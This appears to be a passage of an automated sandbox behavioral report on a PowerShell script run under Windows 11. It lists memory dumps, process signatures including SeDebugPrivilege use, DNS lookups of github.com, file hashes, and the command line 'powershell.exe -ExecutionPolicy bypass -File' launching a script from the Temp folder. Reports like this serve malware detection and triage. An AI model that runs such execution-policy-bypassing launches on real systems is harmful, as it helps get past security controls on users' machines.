memory/4468-114-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-115-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-116-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-117-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-118-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win11-20240508-en

Max time kernel

1651s

Max time network

1661s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/3876-0-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgpwoh3e.tsx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-9-0x0000018DB7680000-0x0000018DB76A2000-memory.dmp

memory/3876-10-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp

memory/3876-11-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp

memory/3876-12-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp

memory/3876-13-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp

memory/3876-14-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp